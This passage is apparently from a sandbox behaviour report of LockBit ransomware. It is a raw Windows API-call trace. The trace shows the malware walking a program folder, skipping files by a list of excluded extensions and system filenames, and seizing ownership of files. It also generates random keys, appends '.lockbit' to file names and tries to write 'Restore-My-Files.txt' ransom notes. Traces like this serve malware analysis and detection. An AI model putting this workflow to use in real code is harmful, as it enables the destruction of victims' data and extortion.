NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.113] malloc (_Size=0xea) returned 0x1ff1e60 [0088.113] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xea, FileInformationClass=0xa) returned 0xc0000008 [0088.113] free (_Block=0x1ff1e60) [0088.114] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0088.114] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0088.114] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.114] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5779d7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5779d7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpecialNavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0088.114] lstrcmpiW (lpString1=".", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.114] lstrcmpiW (lpString1="..", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.114] PathFindExtensionW (pszPath="SpecialNavigationUp_SelectionSubpicture.png") returned=".png" [0088.114] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.114] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.114] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.115] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.115] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.115] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.115] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.115] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.115] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.116] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.116] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.116] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.116] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.116] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.116] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.116] lstrcmpiW (lpString1="ntldr", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.116] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.116] lstrcmpiW (lpString1="bootsect.bak", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.116] lstrcmpiW (lpString1="autorun.inf", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.116] lstrcmpiW (lpString1="thumbs.db", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned 1 [0088.116] lstrcmpiW (lpString1="iconcache.db", lpString2="SpecialNavigationUp_SelectionSubpicture.png") returned -1 [0088.116] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0088.116] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png") returned=".png" [0088.117] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.117] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.117] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.118] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.118] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png.lockbit") returned 112 [0088.118] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.119] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.119] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.119] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.120] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.120] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.120] RtlFreeAnsiString (AnsiString="\\") [0088.120] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0088.120] malloc (_Size=0x200) returned 0x77d800 [0088.120] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.120] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.120] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.120] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.121] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.121] CloseHandle (hObject=0x3a0) returned 1 [0088.122] free (_Block=0x77d800) [0088.122] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0088.122] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.122] malloc (_Size=0x40068) returned 0x3d70048 [0088.122] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3011) returned 1 [0088.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0088.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0088.123] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.130] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.130] malloc (_Size=0xf6) returned 0x1ff1e60 [0088.130] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xf6, FileInformationClass=0xa) returned 0xc0000008 [0088.130] free (_Block=0x1ff1e60) [0088.130] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0088.130] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0088.130] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.130] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fac35, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3fac35, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="specialoccasion.png", cAlternateFileName="")) returned 1 [0088.130] lstrcmpiW (lpString1=".", lpString2="specialoccasion.png") returned -1 [0088.130] lstrcmpiW (lpString1="..", lpString2="specialoccasion.png") returned -1 [0088.130] PathFindExtensionW (pszPath="specialoccasion.png") returned=".png" [0088.130] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.130] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.131] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.131] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.131] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.131] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.131] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.132] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.132] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.132] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.132] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.132] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.132] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.132] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.132] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="specialoccasion.png") returned -1 [0088.132] lstrcmpiW (lpString1="ntldr", lpString2="specialoccasion.png") returned -1 [0088.132] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="specialoccasion.png") returned -1 [0088.132] lstrcmpiW (lpString1="bootsect.bak", lpString2="specialoccasion.png") returned -1 [0088.132] lstrcmpiW (lpString1="autorun.inf", lpString2="specialoccasion.png") returned -1 [0088.132] lstrcmpiW (lpString1="thumbs.db", lpString2="specialoccasion.png") returned 1 [0088.132] lstrcmpiW (lpString1="iconcache.db", lpString2="specialoccasion.png") returned -1 [0088.132] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0088.133] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png") returned=".png" [0088.133] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.133] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.133] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.133] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.133] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.133] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.133] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.133] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.134] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.134] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.134] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.134] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png.lockbit") returned 88 [0088.134] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.134] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.135] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.135] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.135] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.135] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.135] RtlFreeAnsiString (AnsiString="\\") [0088.135] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0088.135] malloc (_Size=0x200) returned 0x77d800 [0088.135] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.135] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.135] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.135] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.136] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.136] CloseHandle (hObject=0x3a0) returned 1 [0088.136] free (_Block=0x77d800) [0088.136] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0088.137] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.137] malloc (_Size=0x40068) returned 0x3d70048 [0088.137] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=19112) returned 1 [0088.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.137] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0088.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0088.138] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.149] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.149] malloc (_Size=0xc6) returned 0x1ff1e60 [0088.149] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc6, FileInformationClass=0xa) returned 0xc0000008 [0088.149] free (_Block=0x1ff1e60) [0088.149] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0088.149] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0088.149] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, 